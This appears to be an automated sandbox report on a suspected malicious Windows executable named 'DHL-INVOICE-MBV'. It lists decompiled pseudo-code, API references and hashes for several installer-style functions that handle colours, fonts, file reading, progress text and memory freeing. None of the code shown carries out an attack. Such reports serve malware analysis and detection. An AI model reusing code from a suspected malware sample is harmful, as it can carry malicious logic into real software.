COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404262(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404274
0x0040432a
0x00000000
0x0040432a
0x00404285
0x00404289
0x00000000
0x004042a3
0x004042a3
0x004042ac
0x00000000
0x00000000
0x004042ae
0x004042ba
0x004042bd
0x004042bd
0x004042c3
0x004042c9
0x004042c9
0x004042d5
0x004042db
0x004042e2
0x004042e5
0x004042e8
0x004042ea
0x004042ea
0x004042f2
0x004042f8
0x004042f8
0x00404302
0x00404307
0x0040430a
0x0040430f
0x00404312
0x00404312
0x00404322
0x00404322
0x00000000
0x00404325

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040427F
GetSysColor.USER32(00000000), ref: 004042BD
SetTextColor.GDI32(?,00000000), ref: 004042C9
SetBkMode.GDI32(?,?), ref: 004042D5
GetSysColor.USER32(?), ref: 004042E8
SetBkColor.GDI32(?,?), ref: 004042F8
DeleteObject.GDI32(?), ref: 00404312
CreateBrushIndirect.GDI32(?), ref: 0040431C

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040264A(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C1F(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061E4(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E5B( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DFD( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004061CB( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1) = __ebp - 0x44;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x0040264a
0x0040264c
0x0040264f
0x00402651
0x00402654
0x00402659
0x0040265d
0x00402660
0x00402663
0x00402ac5
0x00402ac8
0x00402669
0x00402669
0x00402670
0x00402672
0x00402672
0x00402678
0x004027dc
0x004027dc
0x004027df
0x004027e4
0x004015b6
0x0040288b
0x0040288b
0x00000000
0x0040267e
0x0040267f
0x0040268a
0x0040268d
0x00402699
0x0040269d
0x00402735
0x0040274d
0x0040275d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004026a3
0x004026a3
0x004026a6
0x004026a7
0x004026aa
0x004026af
0x004026b6
0x004026be
0x00000000
0x004026c4
0x004026c4
0x004026c9
0x00000000
0x004026cf
0x004026cf
0x004026d7
0x004026da
0x004026dd
0x00402798
0x0040279f
0x004026e3
0x004026e9
0x004026f5
0x0040275f
0x0040275f
0x004026f7
0x004026f7
0x004026fa
0x004026fc
0x004026fc
0x004026fc
0x004026ff
0x00402704
0x00402707
0x00000000
0x00000000
0x00402709
0x0040270c
0x0040271a
0x00402720
0x0040272e
0x00000000
0x00402730
0x00000000
0x00402730
0x00000000
0x0040272e
0x004026fc
0x00402762
0x00402765
0x00000000
0x00402767
0x0040276c
0x004027ad
0x004027cf
0x004027d6
0x004027bb
0x004027bb
0x004027be
0x004027c1
0x004027c4
0x004027c4
0x00000000
0x00402775
0x00402775
0x00402778
0x0040277b
0x00402781
0x00402785
0x00402788
0x00000000
0x00000000
0x00000000
0x00000000
0x00402788
0x0040276c
0x00402765
0x004026dd
0x004026c9
0x004026be
0x00000000
0x0040278a
0x0040278a
0x0040278d
0x00402796
0x00000000
0x0040268d
0x00402678
0x00402ace
0x00402ad4

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BB6(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404bc4
0x00404bd1
0x00404bd7
0x00404c15
0x00404c15
0x00404c24
0x00404c2b
0x00000000
0x00404c2d
0x00404bd9
0x00404be8
0x00404bf0
0x00404bf3
0x00404c05
0x00404c0b
0x00404c12
0x00000000
0x00404c12
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
GetMessagePos.USER32 ref: 00404BD9
ScreenToClient.USER32(?,?), ref: 00404BF3
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B

Strings

f, xrefs: 00404C07

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401DB9(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C1F(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cda8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdb8 = E00402C1F(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdbf = 1;
				 *0x40cdbc = _t15 & 0x00000001;
				 *0x40cdbd = _t15 & 0x00000002;
				 *0x40cdbe = _t15 & 0x00000004;
				E004062A6(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cda8);
				_push(_t18);
				_push(_t33);
				E004061CB();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db9
0x00401dc4
0x00401dc6
0x00401dd3
0x00401dea
0x00401def
0x00401dfc
0x00401e01
0x00401e05
0x00401e10
0x00401e17
0x00401e29
0x00401e2f
0x00401e34
0x00401e3e
0x00402592
0x0040156d
0x00402a6b
0x00402ac8
0x00402ad4

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E

Strings

Tahoma, xrefs: 00401E24

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DF3(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40ce98; // 0x43d4f
					_t11 =  *0x418ea4; // 0x43d53
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402e03
0x00402e11
0x00402e17
0x00402e17
0x00402e25
0x00402e27
0x00402e2d
0x00402e34
0x00402e36
0x00402e36
0x00402e4c
0x00402e5c
0x00402e6e
0x00402e6e
0x00402e76

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(00043D4F,00000064,00043D53), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98

Uniqueness

Uniqueness Score: -1.00%

Function 7411256D Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E7411256D() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E7411121B();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M7411269C))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x7411307c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7411309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E74111470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x7411406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x7411406c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x7411406c);
								goto L17;
							case 5:
								_push( *0x7411406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x74114000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E741112E1(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E74111272(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x74112577
0x74112579
0x7411257d
0x7411258c
0x74112590
0x74112595
0x74112595
0x7411259d
0x741125a4
0x741125aa
0x00000000
0x741125b1
0x00000000
0x00000000
0x741125b9
0x741125bd
0x741125c0
0x741125c4
0x741125cb
0x741125cf
0x741125d5
0x741125d7
0x741125d9
0x741125d9
0x741125e0
0x00000000
0x00000000
0x741125e9
0x00000000
0x00000000
0x741125f0
0x741125f6
0x74112600
0x74112606
0x7411260b
0x00000000
0x00000000
0x7411262c
0x00000000
0x00000000
0x74112612
0x74112618
0x74112619
0x7411261b
0x00000000
0x00000000
0x74112634
0x74112636
0x7411263c
0x74112642
0x74112642
0x00000000
0x00000000
0x741125aa
0x74112645
0x74112645
0x7411264a
0x7411265b
0x7411265b
0x74112661
0x74112666
0x7411266b
0x74112677
0x7411267c
0x00000000
0x74112681
0x7411266d
0x7411266e
0x74112682
0x74112682
0x7411266b
0x74112683
0x74112684
0x74112687
0x7411269b

APIs

Part of subcall function 7411121B: GlobalAlloc.KERNEL32(00000040,?,7411123B,?,741112DF,00000019,741111BE,-000000A0), ref: 74111225

GlobalFree.KERNEL32(?), ref: 7411265B
GlobalFree.KERNEL32(00000000), ref: 74112690

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 0bed1eece6de2293958a188a5f0a740b48f7a1bd7f98cb9192875bf5413adaa5
Instruction ID: da6f88a81092cf5c2bc2d8a9905c376d5f54ba39b248b83158ebaa97b56d1826
Opcode Fuzzy Hash: 0bed1eece6de2293958a188a5f0a740b48f7a1bd7f98cb9192875bf5413adaa5
Instruction Fuzzy Hash: E531F232714143EFEB12BF52D9D4DAAB7B6EBC930472545B8F942A35A4E7309A04CB11

Uniqueness

Uniqueness Score: -1.00%

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004028AD(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C41(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405BD0(_t50) == 0) {
					E00402C41(0xffffffed);
				}
				E00405D55(_t50);
				_t26 = E00405D7A(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a218;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403311(_t45);
						E004032FB(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E00403116();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405D35( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405E2C( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x30)) = E00403116();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028ad
0x004028af
0x004028bb
0x004028be
0x004028c8
0x004028cc
0x004028cc
0x004028d2
0x004028df
0x004028e7
0x004028ea
0x004028f0
0x004028fe
0x00402903
0x00402907
0x0040290a
0x00402913
0x0040291f
0x00402923
0x00402926
0x00402928
0x0040292b
0x0040292c
0x0040292d
0x00402930
0x0040294f
0x00402937
0x0040293c
0x00402944
0x00402947
0x0040294c
0x0040294c
0x00402956
0x00402956
0x00402963
0x00402969
0x0040296f
0x00402970
0x00402971
0x00402974
0x0040297b
0x0040297b
0x00402981
0x00402981
0x0040298c
0x0040298d
0x00402991
0x00402995
